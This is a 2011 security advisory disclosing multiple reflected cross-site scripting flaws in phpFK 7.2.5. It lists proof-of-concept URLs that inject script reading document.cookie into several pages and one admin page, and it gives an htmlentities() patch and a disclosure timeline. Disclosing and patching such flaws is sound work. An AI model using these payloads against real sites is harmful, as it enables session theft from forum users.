SSCHADV2011-022 - phpFK 7.2.5 Multiple Cross-site Scripting vulnerabilities
Advisory:
|
phpFK 7.2.5 Multiple Cross-site Scripting vulnerabilities
|
Advisory ID:
|
SSCHADV2011-022
|
Author:
|
Stefan Schurtz
|
Affected Software:
|
Successfully tested on phpFK 7.2.5 |
Vendor URL:
|
|
Vendor Status:
|
informed
|
CVE-ID:
|
-
|
======================
Vulnerability Description:
======================
Vulnerability Description:
======================
phpFK 7.2.5 is prone to multiple Cross-site scripting vulnerabilities
==============
Technical Details:
==============
Technical Details:
==============
http://<target>/phpfk/faq.php?’"/><script>alert(document.cookie)</script>
http://<target>/phpfk/ranking.php?’"/><script>alert(document.cookie)</script> http://<target>/phpfk/search.php?’"/><script>alert(document.cookie)</script> http://<target>/phpfk/ranking.php?sort=0&page=1’"/><script>alert(document.cookie)</script> http://<target>/phpfk/user.php?user=’"/><script>alert(document.cookie)</script> Backend
http://<target>/phpfk/ap/?nav=user&page=groups_edit&group=’</style></script><script>alert(document.cookie)</script>
|
=====
Solution:
=====
ranking.php
- <td class="oben"><a href="ranking.php?sort=0&page=’.$_GET[‘page’].’">‘.$_TEXT[’LOGIN_USERNAME‘].’</a></td> + <td class="oben"><a href="ranking.php?sort=0&page=’.htmlentities($_GET[‘page’]).’">‘.$_TEXT[’LOGIN_USERNAME‘].’</a></td> – <td class="oben"><a href="ranking.php?sort=1&page=’.$_GET[‘page’].’">‘.$_TEXT[’POINTS‘].’</a></td> + <td class="oben"><a href="ranking.php?sort=1&page=’.htmlentities($_GET[‘page’]).’">‘.$_TEXT[’POINTS‘].’</a></td> – <td class="oben"><a href="ranking.php?sort=2&page=’.$_GET[‘page’].’">‘.$_TEXT[’TIME_OF_REGISTRATION‘].’</a></td> + <td class="oben"><a href="ranking.php?sort=2&page=’.htmlentities($_GET[‘page’]).’">‘.$_TEXT[’TIME_OF_REGISTRATION‘].’</a></td> – <td class="oben"><a href="ranking.php?sort=3&page=’.$_GET[‘page’].’">‘.$_TEXT[’TIME_OF_LAST_VISIT‘].’</a></td> + <td class="oben"><a href="ranking.php?sort=3&page=’.htmlentities($_GET[‘page’]).’">‘.$_TEXT[’TIME_OF_LAST_VISIT‘].’</a></td> |
include/page_top.php
- <form action="’.$url.’" name="login" method="post">
+ <form action="’.htmlentities($url).’" name="login" method="post"> |
Disclosure Timeline:
================
02-Oct-2011 – informed developers
04-Oct-2011 – release date of this security advisory
====
Credits:
====
Vulnerabilities found and advisory written by Stefan Schurtz.
=======
References:
=======
http://www.frank-karau.de/
http://www.rul3z.de/advisories/SSCHADV2011-022.txt
Comments
Display comments as Linear | Threaded